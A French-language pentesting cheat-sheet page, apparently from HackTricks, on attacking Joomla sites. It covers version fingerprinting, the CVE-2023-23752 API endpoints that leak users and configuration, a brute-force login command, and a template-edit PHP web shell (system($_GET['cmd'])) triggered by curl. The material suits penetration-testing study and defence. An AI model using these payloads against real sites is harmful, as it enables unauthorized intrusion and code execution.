6.6 KiB
Joomla
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Statistiques Joomla
Joomla collecte des statistiques d'utilisation anonymes telles que la répartition des versions de Joomla, PHP et des systèmes de gestion de bases de données ainsi que des systèmes d'exploitation de serveur utilisés sur les installations Joomla. Ces données peuvent être interrogées via leur API publique.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Enumeration
Discovery/Footprinting
- Vérifiez les meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
- Dans /administrator/manifests/files/joomla.xml, vous pouvez voir la version.
- Dans /language/en-GB/en-GB.xml, vous pouvez obtenir la version de Joomla.
- Dans plugins/system/cache/cache.xml, vous pouvez voir une version approximative.
Automatique
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - La méthodologie de pentesting Web est une section sur les scanners CMS qui peuvent scanner Joomla.
Divulgation d'informations non authentifiées via l'API :
Les versions de 4.0.0 à 4.2.7 sont vulnérables à la divulgation d'informations non authentifiées (CVE-2023-23752) qui va exposer des identifiants et d'autres informations.
- Utilisateurs :
http://<host>/api/v1/users?public=true
- Fichier de configuration :
http://<host>/api/index.php/v1/config/application?public=true
Module MSF : scanner/http/joomla_api_improper_access_checks
ou script ruby : 51334
Brute-Force
Vous pouvez utiliser ce script pour tenter de forcer le login.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
Si vous parvenez à obtenir des identifiants administratifs, vous pouvez RCE à l'intérieur en ajoutant un extrait de code PHP pour obtenir RCE. Nous pouvons le faire en personnalisant un modèle.
- Cliquez sur
Templates
en bas à gauche sousConfiguration
pour faire apparaître le menu des modèles. - Cliquez sur un nom de modèle. Choisissons
protostar
sous l'en-tête de colonneTemplate
. Cela nous amènera à la pageTemplates: Customise
. - Enfin, vous pouvez cliquer sur une page pour faire apparaître le code source de la page. Choisissons la page
error.php
. Nous ajouterons une ligne de code PHP pour obtenir l'exécution de code comme suit : system($_GET['cmd']);
- Enregistrer & Fermer
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
De XSS à RCE
- JoomSploit : Script d'exploitation Joomla qui élève XSS à RCE ou d'autres vulnérabilités critiques. Pour plus d'infos, consultez ce post. Il fournit un support pour les versions Joomla 5.X.X, 4.X.X et 3.X.X, et permet de :
- Élévation de privilèges : Crée un utilisateur dans Joomla.
- (RCE) Édition de modèles intégrés : Éditer des modèles intégrés dans Joomla.
- (Personnalisé) Exploits personnalisés : Exploits personnalisés pour des plugins Joomla tiers.
{% hint style="success" %}
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Consultez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.